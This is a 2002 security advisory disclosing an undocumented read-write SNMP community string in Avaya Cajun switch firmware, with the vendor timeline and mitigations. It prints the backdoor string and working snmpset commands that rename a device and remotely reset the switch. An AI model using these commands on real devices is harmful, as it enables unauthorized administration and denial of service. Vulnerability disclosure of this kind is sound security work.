SNMP vulnerability in AVAYA Cajun firmware

[Jacek Lipkowski <sq5bpf () andra com pl>]

1. Problem Description

There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.

2. Tested systems

The following versions were tested and found vulnerable:

Avaya Cajun P330T software version 3.8.2 and 3.9.1
Avaya Cajun P333R software version 3.8.1 and 3.9.1

Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
was found to be vulnerable.


3. Details

Various Cajun firmware contains an undocumented community r/w string NoGaH$@!
To test try:

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

Reset a Cajun switch remotely (fun party trick):

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1


4. Recommendations

As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:

sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the
'set allowed managers' command, which appeared in recent Cajun firmware.


5. Vendor status

AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, I have
agreed to release the information after the release of fixed software. The
fixed software has been released on July 4, and is avaliable from the
Avaya support site http://support.avaya.com. Official AVAYA security
advisories are located at http://support.avaya.com/security/


6. Disclaimer

Neither I nor my employer is responsible for the use or misuse of
information in this advisory.  The opinions expressed are my own and not
of any company.  Any use of the information is at the user's own risk.


Jacek Lipkowski sq5bpf () andra com pl

Andra Co. Ltd.
ul Wynalazek 6
02-677 Warsaw, Poland
http://www.andra.com.pl